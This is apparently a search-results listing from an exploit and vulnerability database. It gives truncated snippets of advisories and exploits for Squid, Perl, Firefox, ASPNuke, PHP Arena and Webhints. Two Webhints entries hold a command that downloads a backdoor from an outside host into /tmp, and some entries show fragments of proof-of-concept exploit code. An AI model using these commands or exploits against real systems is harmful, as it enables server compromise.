9413 matches found
Squid Set-Cookie Header Cross-session Information Disclosure
The remote Squid caching proxy, according to its banner, is prone to an information disclosure vulnerability. Due to a race condition, Set-Cookie headers may leak to other users if the requested server employs the deprecated Netscape Set-Cookie specifications with regards to how cacheable content...
FreeBSD : perl -- vulnerabilities in PERLIO_DEBUG handling (a5eb760a-753c-11d9-a36f-000a95bc6fae)
Kevin Finisterre discovered bugs in perl's I/O debug support: - The environmental variable PERLIO_DEBUG is honored even by the set-user-ID perl command usually named sperl or suidperl. As a result, a local attacker may be able to gain elevated privileges. CVE-2005-0155 - A buffer overflow may occ...
Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution
// Exploit by Michael Krax Firewalling - Proof-of-Concept function stopload // in some cases the javascript url never stops to load // therefore we force a stop after the real image got loaded window.setTimeout"window.stop",1000; Firewalling - Proof-of-Concept The "Set As Wallpaper" dialog takes...
Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit
Exploit for unknown platform in category remote exploits ================================================================== Mozilla Firefox Firewalling - Proof-of-Concept function stopload // in some cases the javascript url never stops to load // therefore we force a stop after the real image go...
Mozilla Firefox <= 1.0.4 "Set As Wallpaper" Code Execution Exploit
No description provided by source. // Exploit by Michael Krax !DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" html head titleFirewalling - Proof-of-Concept/title script function stopload // in some cases the javascript url never stops to load // therefore we force a stop after the...
FreeBSD : kstars -- exploitable set-user-ID application fliccd (0512b761-70fb-40d3-9954-aa4565528fa8)
A KDE Security Advisory explains: Overview KStars includes support for the Instrument Neutral Distributed Interface (INDI). The build system of this extra 3rd party software contained an installation hook to install fliccd (part of INDI) as SUID root application. Erik Sjolund discovered that the cod...
Code execution via "Set as Wallpaper" — Mozilla
If an attacker can convince a victim to use the "Set As Wallpaper" context menu item on a specially crafted image then they can run arbitrary code on the user's computer. The image "source" must be a javascript: url containing an eval statement and such an image would get the "broken image" icon,...
ASPNuke 0.80 - article.asp SQL Injection
!/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: ASPNuke ASP Portal Expl0it By: [email protected] Discovered By: Trap-Set Underground Hacking Team oilKarchacK GR33tz T0 == Alphaprogrammer -- oilKarchack -- theCephale...
ASPNuke <= 0.80 (article.asp) SQL Injection Exploit
Exploit for unknown platform in category web applications =================================================== ASPNuke Alphaprogrammer -- oilKarchack -- theCephaleX -- Str0ke And Iranian Security & Technical Sites: IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team , Crouz Security...
ASPNuke 0.80 - 'article.asp' SQL Injection
!/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: ASPNuke ASP Portal Expl0it By: [email protected] Discovered By: Trap-Set Underground Hacking Team oilKarchacK GR33tz T0 == Alphaprogrammer -- oilKarchack -- theCephaleX -- Str0ke And Iranian Security &...
Unpassworded 'mpi' Account
The account 'mpi' on the remote host does not have a password set. An attacker may use this to gain further privileges on this system. %NASLMINLEVEL 70300 C Tenable Network Security, Inc. account = "mpi"; password = ""; include'deprecatednasllevel.inc'; include'compat.inc'; if description...
PHP Arena <= 1.1.3 pafiledb.php Remote Change Password Exploit
No description provided by source. !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: PHP Arena paFileDB 1.1.3 And 0lder Expl0it By: A l p h a P r o g r a m m e r Sirus-v Email: [email protected] + Discovered By: GulfTech + Advisory:...
PHP Arena 1.1.3 - pafiledb.php Remote Change Password
!/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: PHP Arena paFileDB 1.1.3 And 0lder Expl0it By: A l p h a P r o g r a m m e r Sirus-v Email: [email protected] + Discovered By: GulfTech +...
security flaw
Race condition in Squid 2.5.STABLE7 to 2.5.STABLE9, when using the Netscape Set-Cookie recommendations for handling cookies in caches, may cause Set-Cookie headers to be sent to other users, which allows attackers to steal the related cookies...
Webhints 1.03 - Remote Command Execution (Perl) (1)
This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR:...
Webhints 1.03 - Remote Command Execution (Perl) (1)
This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln Expl0it...
Webhints <= 1.03 Remote Command Execution Exploit (c code) (2)
Exploit for cgi platform in category web applications ============================================================== Webhints mhp0rtal -- oilKarchack -- The-CephaleX -- Str0ke And Iranian Security & Technical Sites: TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG Crouz , Simorgh-ev...
Webhints 1.03 - Remote Command Execution (C) (2)
/ T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR : WebHints Remote C0mmand Execution Vuln Coded By: A l p h a P r o g r a m m e r Sirus-v E-Mail: [email protected] This Xpl Upload a Page in Vulnerable Directory , You ca...
Webhints 1.03 - Remote Command Execution (C) (2)
/ T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR : WebHints Remote C0mmand Execution Vuln Coded By: A l p h a P r o g r a m m e r Sirus-v E-Mail: [email protected] This Xpl Upload a Page in Vulnerable Directory , You can Change This Code For Yourself GR33tz T0 ==...
Webhints <= 1.03 Remote Command Execution Exploit (perl code) (1)
Exploit for cgi platform in category web applications ================================================================= Webhints mhp0rtal -- oilKarchack -- The-CephaleX -- Str0ke...